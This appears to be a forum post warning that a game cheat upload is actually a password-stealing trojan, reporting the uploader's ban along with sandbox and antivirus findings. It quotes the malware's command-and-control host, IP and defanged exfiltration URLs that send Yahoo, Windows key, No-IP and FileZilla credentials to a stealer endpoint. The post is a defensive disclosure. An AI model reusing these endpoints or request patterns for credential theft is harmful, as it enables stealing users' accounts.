Thats because it is a trojan.
Malicious TROJAN Detected
First of all. NO credits are provided by the original poster, Mr. California. Second of all, the file is a VB app. No one codes CS/CSS cheats in VB. This is a hoax, and user has been banned/removed ( for now, being this is what.. his 12th account he's used? ).
Trojan connects to
Code:
starx626.byethost22.com (209.51.196.243)
and download URLs:
Code:
hxxp://209.51.196.243/stealer/index.php?action=add&protocol=Yahoo-ETS&url=http://yahoo.com&user=&pass=&pcname=DELL-&date=20:10:2009 (starx626.byethost22.com)
hxxp://209.51.196.243/stealer/index.php?action=add&protocol=Windows-Cd-Key&url=QWF9C-F22WQ-RP8M9-2GV92-XXXXX&user(null)&pass(null)&pcname=DELL-&date=20:10:2009 (starx626.byethost22.com)
hxxp://209.51.196.243/stealer/index.php?action=add&protocol=No-IP&url=&user=&pass=&pcname=DELL-&date=20:10:2009 (starx626.byethost22.com)
hxxp://209.51.196.243/stealer/index.php?action=add&protocol=FileZilla&url=NotFound&user=NotFound&pass=NotFound&pcname=DELL-&date=20:10:2009 (starx626.byethost22.com)
Code:
Outgoing connection to remote server: starx626.byethost22.com TCP port 80
Outgoing connection to remote server: starx626.byethost22.com TCP port 80
Outgoing connection to remote server: starx626.byethost22.com TCP port 80
Outgoing connection to remote server: starx626.byethost22.com TCP port 80
Quote:
|
Antivirus reportsDetection ratio: 12 / 25 (48%)A-Squared: Trojan-PWS.Win32.VB!IK Avira: TR/Dropper.GenAvast: Win32:Trojan-gen AVG: Trojan horse PSW.Generic7.ACQF BitDefender: Nothing foundCA: Nothing foundClamav: Nothing foundDrWeb: Nothing foundF-prot: W32/Trojan2.IYCM (exact)F-Secure: Trojan-PSW.Win32.VB.bbaGdata: Trojan-PSW.Win32.VB.bbaIkarus: Nothing foundKaspersky: Trojan-PSW.Win32.VB.bbaKingSoft: Nothing foundMcafee: Nothing foundNOD32: Nothing foundNorman: Nothing foundNorton: Trojan HorsePanda: Nothing foundQuickHeal: TrojanPSW.VB.bbaSophos: Nothing foundTrendmicro: TSPY_VB.IWSVBA32: Trojan-PSW.Win32.VB.bba Virusbuster: Nothing foundZoner: Nothing found
|